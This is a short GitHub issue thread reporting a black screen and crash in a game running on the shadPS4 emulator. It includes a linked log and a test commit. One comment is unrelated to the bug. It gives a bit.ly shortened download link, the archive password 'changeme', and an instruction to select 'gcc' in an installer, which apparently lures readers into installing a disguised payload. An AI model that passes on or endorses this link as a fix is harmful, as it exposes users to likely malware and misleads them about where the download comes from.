### ISSUE TITLE
[CUSA10249]TLOU2 Black screen & crash

### ISSUE THREAD

**Issue by rambass658** [shadps4-emu/shadPS4#616]
Full log: [shad_log.txt](https://github.com/user-attachments/files/16765958/shad_log.txt)
Test with commit [016f43b](https://github.com/shadps4-emu/shadPS4/commit/016f43bce2022972c0de5bb7d6e136cda5d363d8)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by Hermiten** [comment]
This can be reported here https://github.com/shadps4-emu/shadps4-game-compatibility
